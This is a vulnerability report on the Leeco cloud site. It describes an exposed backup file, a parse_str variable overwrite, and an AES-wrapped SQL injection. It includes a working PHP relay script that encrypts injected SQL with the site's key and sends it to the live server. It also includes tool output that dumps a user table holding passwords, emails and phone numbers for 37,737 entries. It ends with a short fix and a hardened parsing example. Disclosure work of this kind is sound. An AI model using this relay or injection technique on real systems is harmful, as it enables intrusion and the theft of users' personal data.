An injection flaw in an important Leeco business system can leak a large amount of enterprise information.
A variable overwrite leads to arbitrary injection.
http://www.letvcloud.com/www.tar.gz The Leeco cloud site exposes a backup file.
www/Home/Lib/Action/UserAction.class.php
public function auditupdate()
{
    import("@.ORG.util");
    $ua = $this->_get('ua');
    $uaid = $this->decrypturl($ua);
    parse_str($uaid);
    $userDao = D('userdetail');
    $lists = $userDao->get($userid);
    $this->assign("lists", $lists);
    $tags = Util::getSelectHtml('sitetypeid', $this->_getWebTypeList(), 'sitetypeid', 'sitetypename', $lists['sitetypeid'], 1, false);
    // The location
    $cityaction = A('city');
    $province = $cityaction->getprovince();
    $provincehtml = Util::getSelectHtml('province', $province, 'cityid', 'cityname', $lists['province'], 1, true, '-- select --');
    $cityDao = D('city');
    $citylist = $cityDao->getList(false, 0, 0, 'parentid = ' . $lists['province']);
    $cityhtml = Util::getSelectHtml('city', $citylist, 'cityid', 'cityname', $lists['city'], 1, true, '-- select --');
    $this->assign("webtypeselectHtml", $webtypeselectHtml);
    $this->assign("userid", $userid);
    $this->assign("ua", $ua);
    $this->assign("provincehtml", $provincehtml);
    $this->assign("cityhtml", $cityhtml);
    $this->display();
}
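The variable overwrite is in parse_str($uaid); called without a result array, it creates a variable in the current scope for every key in the string.
$uaid can therefore overwrite any variable.
decrypturl decrypts the content of ua, which is encrypted with AES.
The AES key can be found in the configuration file.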
<?php
include("aes.php");
$sql = $_GET['sql'];
*****AES(tr**********D398bslw**********t;makeKe*****
$uaid = $aes->encryptString("userid=" . $sql, $keys);
echo "http://www.letvcloud.com/user/auditupdate?ua=" . $uaid . "<br>";
echo file_get_contents("http://www.letvcloud.com/user/auditupdate?ua=" . $uaid);
?>
With the above script used as a local relay, the userid variable can be overwritten directly and is carried into the SQL query.
Table: user_detail_info
[28 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| address           | varchar(200) |
| allowclone        | tinyint(4)   |
| ark               | int(4)       |
| audittext         | text         |
| businesslicense   | varchar(200) |
| city              | varchar(50)  |
| codeversionrights | varchar(20)  |
| codeversions      | varchar(20)  |
| company           | varchar(100) |
| ctime             | int(11)      |
| domainname        | varchar(100) |
| email             | varchar(100) |
| is_showsearch     | tinyint(1)   |
| limit_upload      | int(10)      |
| mobile            | varchar(100) |
| parentid          | int(11)      |
| password          | varchar(100) |
| province          | varchar(50)  |
| reasonid          | int(11)      |
| sitename          | varchar(200) |
| sitetypeid        | tinyint(3)   |
| source            | varchar(20)  |
| status            | tinyint(1)   |
| telephone         | varchar(100) |
| userid            | int(11)      |
| username          | varchar(100) |
| usertype          | tinyint(3)   |
| utime             | int(11)      |
+-------------------+--------------+
[14:09:51] [INFO] fetching entries for table 'user_detail_info' on database 'bcloud'
[14:09:51] [INFO] the SQL query used returns 37737 entries
[14:09:53] [INFO] retrieved: 5/37737 entries
Solution:
Strengthen filtering and improve the security awareness of O&M personnel.
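One way to apply that filtering to the parse_str() call in auditupdate(), as an added example that is not part of the original report or Leeco's code: parse the decrypted string into an array instead of the local scope and accept only a single numeric userid. The helper name parse_ua_userid and the sample payloads are assumptions constructed for illustration.

```php
<?php
// Added example: hardened handling of the decrypted "ua" payload.
// parse_ua_userid() is a hypothetical helper, not the application's own code.

/**
 * Extract userid from the decrypted query string without touching local scope.
 * Returns the id as int, or null unless the payload is exactly one numeric userid.
 */
function parse_ua_userid(string $uaid): ?int
{
    $params = [];
    // The second argument keeps parsed keys inside $params instead of
    // creating or overwriting variables in the caller's scope.
    parse_str($uaid, $params);

    // Accept only the single expected key; extra keys are rejected outright.
    if (array_keys($params) !== ['userid']) {
        return null;
    }

    $raw = $params['userid'];
    // Arrays (userid[]=1) and anything that is not pure digits must not
    // reach the query; the length cap matches an int(11) column.
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 10) {
        return null;
    }

    return (int) $raw;
}

// Constructed sample payloads, standing in for the output of decrypturl().
$samples = [
    'userid=1024',        // expected form
    'userid=1 or 1=1',    // non-numeric value
    'userid[]=5',         // array instead of scalar
    'userid=7&lists=x',   // attempt to set a second variable
    '',                   // empty payload
];

foreach ($samples as $s) {
    $id = parse_ua_userid($s);
    printf("%-22s => %s\n", var_export($s, true), $id === null ? 'rejected' : "userid $id");
}
```

The validated integer should still be passed to the database layer as a bound parameter, and the www.tar.gz backup that exposed the AES key should not be reachable from the web root.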